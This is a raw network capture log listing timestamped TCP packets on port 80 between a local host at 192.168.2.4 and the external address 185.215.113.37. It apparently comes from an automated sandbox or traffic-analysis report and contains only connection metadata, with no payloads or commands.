Sep 26, 2024 22:40:17.499938965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499944925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.499953985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499964952 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.499969959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499984980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.499985933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.500000954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.500017881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.500022888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.500042915 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.500082016 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.627767086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.627784014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.627800941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.627826929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.627844095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.627844095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.627861023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.627871990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.627876997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.627892971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.627907991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.627923012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.627933979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.627938986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.627954960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.627955914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.627970934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.627993107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.627993107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.628012896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628029108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628038883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.628058910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628077984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.628083944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628098965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628113031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.628115892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628129005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628144026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628149033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.628160000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628180981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628189087 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.628196955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628206968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.628211975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628230095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628243923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.628253937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628269911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628278971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.628284931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628300905 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.628302097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628319025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628334999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628334999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.628371000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.628381968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628387928 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.628396988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628428936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628431082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.628441095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.628444910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628460884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628477097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628478050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.628489017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.628493071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628513098 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.628546953 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.628582001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628597975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628613949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628628969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628635883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.628647089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628664017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628673077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.628679991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628695011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.628705025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628720999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628727913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.628736019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628757954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628765106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.628778934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628793955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.628827095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.628851891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628866911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628880978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628895044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628895044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.628921986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628928900 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.628940105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628956079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628963947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.628972054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.628984928 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.628988028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.629004002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.629019022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.629024029 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.629035950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.629051924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.629056931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.629070997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.629077911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.629098892 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.629132032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.629189968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.629204988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.629220009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.629234076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.629235983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.629250050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.629254103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.629266977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.629277945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.629283905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.629301071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.629312992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.629323006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.629333019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.629337072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.629354000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.629368067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.629369974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.629403114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.629420042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.629434109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.629448891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.629463911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.629477978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.629492998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.629493952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.629512072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.629528046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.629554987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.756964922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.756979942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757003069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757029057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757042885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757049084 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.757064104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757075071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.757098913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757121086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757121086 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.757138014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757163048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757164955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.757179022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757191896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.757194996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757210970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757226944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757235050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.757253885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757256031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.757270098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757285118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757296085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.757312059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757317066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.757328033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757343054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.757344007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757369041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757380962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.757385015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757405043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.757411003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757426023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757441998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757456064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757457972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.757472992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757483006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.757487059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757503033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.757503986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757519960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.757539988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757558107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757570028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.757572889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757590055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.757599115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757612944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757625103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.757638931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757656097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757667065 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.757673979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757688999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.757689953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757705927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757714987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.757720947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757735014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.757739067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757754087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757777929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757785082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.757785082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.757793903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757818937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757836103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757841110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.757850885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757868052 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.757877111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757888079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.757894993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757910967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757913113 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.757927895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757934093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.757952929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757956028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.757977009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757993937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.757996082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.758008957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758028030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758034945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.758044004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758060932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758063078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.758078098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758093119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758107901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.758119106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758126974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.758135080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758152962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758167982 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.758168936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758193016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758205891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.758219957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758229017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.758236885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758253098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758281946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758282900 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.758297920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758306980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.758316040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758325100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.758332968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758349895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758362055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.758369923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758387089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758403063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758403063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.758419037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758424997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.758445024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758452892 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.758461952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758483887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758490086 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.758502007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758517027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758519888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.758543968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758548975 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.758559942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758565903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.758577108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758593082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758611917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758619070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.758637905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.758645058 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.758665085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.758687973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.887753963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.887770891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.887785912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.887814045 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.887852907 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.888266087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.888281107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.888295889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.888314009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.888356924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.888360977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.888379097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.888395071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.888407946 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.888411999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.888427973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.888442039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.888479948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.888598919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.888613939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.888633966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.888645887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.888659954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.888674974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.888684988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.888691902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.888720036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.888735056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.888737917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.888751030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.888777971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.888780117 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.888793945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.888803005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.888819933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.888823986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.888834000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.888850927 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.888859034 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.888881922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.888906002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.888922930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.888938904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.888952971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.888978004 CEST	49730	80	192.168.2.4	185.215.113.37
